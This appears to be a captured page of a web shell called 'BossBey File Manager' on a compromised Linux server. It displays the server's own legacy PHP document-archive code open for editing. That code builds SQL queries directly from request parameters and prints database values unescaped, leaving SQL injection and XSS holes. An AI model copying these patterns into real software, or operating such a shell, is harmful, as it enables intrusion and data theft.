BossBey File Manager
PHP:
7.3.31-1~deb10u1
OS:
Linux
User:
www-data
Root
/
home
/
www
/
inorg
/
coord_old
📤 Upload
рџ“ќ New File
рџ“Ѓ New Folder
Close
Editing: file_manager_incl.php
<?php defined ('head') or die("Запрещен прямой доступ"); include_once("auth_incl.php"); include_once("db_connect_incl.php"); include_once("settings_incl.php"); //******************* UNAUTHORIZED ******************* if ($rez==0) { echo ("<br><br><strong>НЕОБХОДИМА АВТОРИЗАЦИЯ :(</strong>"); exit; } //***************** END UNAUTHORIZED ***************** //---folders tree generation function list_subfolders($folder_id, $prefix) { $sql_query="select * from doc_folders where parent=$folder_id order by name"; $folder_result=mysql_query($sql_query); $n=mysql_numrows($folder_result); for ($i=0; $i<$n; $i++) { $list_folder_name=mysql_result($folder_result,$i,name); $list_folder_id=mysql_result($folder_result,$i,id); echo ("<option value=$list_folder_id>$prefix$list_folder_name</option>"); $sql_query="select * from doc_folders where parent=$list_folder_id"; $temp_result=mysql_query($sql_query); if (mysql_numrows($temp_result)!=0) { $sub_prefix="--".$prefix; list_subfolders($list_folder_id,$sub_prefix); } } }; //---show full path to folder function folder_name($folder_id) { $sql_query="select * from doc_folders where id=$folder_id;"; $folder_result=mysql_query($sql_query); $folder_name=mysql_result($folder_result,0,name); $parent=mysql_result($folder_result,0,parent); if ($parent!=0) { $folder_name=folder_name($parent)." / ".$folder_name; } return $folder_name; } $edit_folder=$_POST['edit_folder']; $edit_document=$_POST['edit_document']; //---folder editing if ($edit_folder==1) { $folder_id=$_POST['folder_id']; if ($folder_id!='new') { $sql_query="select * from doc_folders where id=$folder_id"; $result=mysql_query($sql_query); $folder_name=mysql_result($result,0,name); //---folder copy if (isset($_POST['copy_x'])) { echo(" <form action=file_manager.php?$add method=post> <input type=hidden name=folder_id value=$folder_id> <input type=hidden name=edit_folder value=1> Копировать директорию<br>\"<b>$folder_name</b>\"<br>в <select name=to_folder_id> <option selected value=0>Корневая директория</option>"); list_subfolders(0,"--"); echo("</select> <input type=submit name=copy value=\"Копировать\"> <input type=submit name=cancel value=\"Отмена\"> </form>"); } //---folder move elseif (isset($_POST['move_x'])) { echo(" <form action=file_manager.php?$add method=post> <input type=hidden name=folder_id value=$folder_id> <input type=hidden name=edit_folder value=1> Переместить директорию<br>\"<b>$folder_name</b>\"<br>в <select name=to_folder_id> <option selected value=0>Корневая директория</option>"); list_subfolders(0,"--"); echo("</select> <input type=submit name=move value=\"Переместить\"> <input type=submit name=cancel value=\"Отмена\"> </form>"); } //---folder rename elseif (isset($_POST['rename_x'])) { echo(" <form action=file_manager.php?$add method=post> <input type=hidden name=folder_id value=$folder_id> <input type=hidden name=edit_folder value=1> Переименовать директорию<br> <input type=text name=folder_name size=50 value=\"$folder_name\"><br> <input type=submit name=rename value=\"Переименовать\"> <input type=submit name=cancel value=\"Отмена\"> </form>"); } //---folder delete elseif (isset($_POST['delete_x'])) { echo(" <form action=file_manager.php?$add method=post> <input type=hidden name=folder_id value=$folder_id> <input type=hidden name=edit_folder value=1> Удалить директорию?<br>\"<b>$folder_name</b>\"<br> <input type=submit name=delete value=\"Удалить\"> <input type=submit name=cancel value=\"Отмена\"> </form>"); } } } //---document edit elseif ($edit_document==1) { $document_id=$_POST['document_id']; if ($document_id!='new') { $sql_query="select * from documents where id=$document_id"; $result=mysql_query($sql_query); $document_folder=mysql_result($result,0,folder); $document_filename=mysql_result($result,0,filename); $document_comment=mysql_result($result,0,comment); //---document copy if (isset($_POST['copy_x'])) { echo(" <form action=file_manager.php?$add method=post> <input type=hidden name=document_id value=$document_id> <input type=hidden name=edit_document value=1> Копировать документ<br>\"<b>$document_filename</b>\"<br>в <select name=to_folder_id> <option selected value=0>Корневая директория</option>"); list_subfolders(0,"--"); echo("</select> <input type=submit name=copy value=\"Копировать\"> <input type=submit name=cancel value=\"Отмена\"> </form>"); } //---document move elseif (isset($_POST['move_x'])) { echo(" <form action=file_manager.php?$add method=post> <input type=hidden name=document_id value=$document_id> <input type=hidden name=edit_document value=1> Переместить документ<br>\"<b>$document_filename</b>\"<br>в <select name=to_folder_id> <option selected value=0>Корневая директория</option>"); list_subfolders(0,"--"); echo("</select> <input type=submit name=move value=\"Переместить\"> <input type=submit name=cancel value=\"Отмена\"> </form>"); } //---document rename elseif (isset($_POST['rename_x'])) { echo(" <form action=file_manager.php?$add method=post> <input type=hidden name=document_id value=$document_id> <input type=hidden name=edit_document value=1> изменить примечание к документу<br> <textarea name=document_comment cols=50 raws=5>$document_comment</textarea><br> <input type=submit name=rename value=\"Изменить прмечание\"> <input type=submit name=cancel value=\"Отмена\"> </form>"); } //---document delete elseif (isset($_POST['delete_x'])) { echo(" <form action=file_manager.php?$add method=post> <input type=hidden name=document_id value=$document_id> <input type=hidden name=edit_document value=1> Удалить документ?<br><b>$document_filename<br>$document_comment</b><br> <input type=submit name=delete value=\"Удалить\"> <input type=submit name=cancel value=\"Отмена\"> </form>"); } } } //---listing else { //---folder_id and folder_name detrmiantion $folder_id=$_POST['folder_id']; $header=""; if ($folder_id=="") {$folder_id=$_GET['folder_id'];}; if (($folder_id=="")||($folder_id==0)) {$folder="documents"; $folder_id=0;} else { $folder=$folder_id; $folder="documents/".$folder; $folder_name=folder_name($folder_id); $sql_query="select * from doc_folders where id=$folder_id;"; $folder_result=mysql_query($sql_query); $parent=mysql_result($folder_result,0,parent); $header="<br>Директория <font color=AA0000>$folder_name</font> <a href=index.php?section=admin&action=edit_documents&folder_id=$parent$add>Вверх</a>"; if (isset($_GET['fileexist'])) {$header=$header."<br><span style=\"font-size: 18px; color: AA0000;\">ОШИБКА! ФАЙЛ С ТАКИМ ИМЕНЕМ СУЩЕСТВУЕТ</span>";}; }; //---header echo (" <table align=center width=480 cellspacing=1 cellpadding=0 border=0 bgcolor=00aa00> <tr height=30><th align=center bgcolor=FFFFFF>Редактирование архива документов$header</th></tr></table> "); //---list of subfolders echo("<br>"); $sql_query="select * from doc_folders where parent=$folder_id order by name;"; $folder_result=mysql_query($sql_query); $n=mysql_numrows($folder_result); echo(" <table width=100% cellspacing=1 cellpadding=0 border=0 bgcolor=00aa00> "); for ($i=0; $i<$n; $i++) { $list_folder_name=mysql_result($folder_result,$i,name); $list_folder_id=mysql_result($folder_result,$i,id); echo (" <tr height=30> <td width=10% align=center bgcolor=FAF0E6> <a href=index.php?section=admin&folder_id=$list_folder_id&action=edit_documents$add><img border=0 src=\"images/documents/folder_small.gif\" alt=\"$list_folder_name\"></a> </td> <td width=70% align=center bgcolor=FAF0E6> <a href=index.php?section=admin&folder_id=$list_folder_id&action=edit_documents$add><b>$list_folder_name</b></a> </td> <form action=index.php?section=admin&action=edit_documents$add method=post><td width=20% align=center bgcolor=FAF0E6> <input type=hidden name=edit_folder value=1> <input type=hidden name=folder_id value=$list_folder_id> <input type=image name=rename src=\"images/documents/rename.gif\" alt=\"Переименовать\"> <input type=image name=copy src=\"images/documents/copy.gif\" alt=\"Копировать\"> <input type=image name=move src=\"images/documents/move.gif\" alt=\"Переместить\"> <input type=image name=delete src=\"images/documents/delete.gif\" alt=\"Удалить\"></td></form> </tr> "); } //---List of documents $sql_query="select * from documents where folder=$folder_id;"; $result=mysql_query($sql_query); $n=mysql_numrows($result); for ($i=0; $i<$n; $i++) { $id=mysql_result($result,$i,id); $filename=mysql_result($result,$i,filename); $comment=mysql_result($result,$i,comment); echo (" <tr height=30> <td width=10% align=center bgcolor=FAF0E6><a href=\"http://$domain/$folder/$filename\" target=_blank><img border=0 src=\"images/documents/"); if (substr($filename,-3,3)=="doc") {echo ("doc.gif");} elseif (strtolower(substr($filename,-3,3))=="rtf") {echo ("doc.gif");} elseif (strtolower(substr($filename,-3,3))=="xls") {echo ("xls.gif");} elseif (strtolower(substr($filename,-3,3))=="ppt") {echo ("ppt.gif");} elseif (strtolower(substr($filename,-3,3))=="pdf") {echo ("pdf.gif");} elseif (strtolower(substr($filename,-3,3))=="gif") {echo ("gif.gif");} elseif ((strtolower(substr($filename,-3,3))=="jpg")||(strtolower(substr($filename,-4,4))=="jpeg")) {echo ("jpg.gif");} else {echo ("file.gif");} echo("\"></a></td> <td width=70% align=center bgcolor=FAF0E6>$comment</td> <form action=index.php?section=admin&action=edit_documents$add method=post><td width=20% align=center bgcolor=FAF0E6> <input type=hidden name=edit_document value=1> <input type=hidden name=document_id value=$id> <input type=image name=rename src=\"images/documents/rename.gif\" alt=\"Изменить примечание\"> <input type=image name=copy src=\"images/documents/copy.gif\" alt=\"Копировать\"> <input type=image name=move src=\"images/documents/move.gif\" alt=\"Переместить\"> <input type=image name=delete src=\"images/documents/delete.gif\" alt=\"Удалить\"></td></form> </tr> <tr height=30> <td width=100% colspan=3 align=center bgcolor=FAF0E6>http://$domain/$folder/$filename</td> </tr> "); } echo (" </table> "); //---Create folder form echo (" <br><table width=100% cellspacing=1 cellpadding=0 border=0 bgcolor=00aa00> <tr height=30> <th align=center bgcolor=FAF0E6>Создать новую папку</th> </tr> <tr height=30> <form action=file_manager.php?section=admin$add method=post> <td align=center bgcolor=FAF0E6> <input type=hidden name=edit_folder value=1> <input type=hidden name=folder_id value=new> <input type=hidden name=parent value=$folder_id> <input type=text name=folder_name size=50> <input type=image name=create src=\"images/documents/add_s.gif\" alt=\"Создать\"> </td> </form> </tr> </table><br> "); //---Add document form echo(" <table width=100% cellspacing=1 cellpadding=0 border=0 bgcolor=00aa00> <tr height=30> <th align=center bgcolor=FAF0E6>Добавить новый документ</th> </tr> <tr height=30> <form action=file_manager.php?$add method=post enctype=multipart/form-data> <td width=100% align=center colspan=4 bgcolor=FAF0E6> <input type=hidden name=edit_document value=1> <input type=hidden name=document_id value=new> <input type=hidden name=folder_id value=$folder_id> <input type=file size=50 name=document><br> Примечание<br><textarea cols=50 rows=3 name=comment></textarea><br> <input type=submit value='Добавить документ'><br> </td> </form> </tr> </table> "); } ?>
Save
Cancel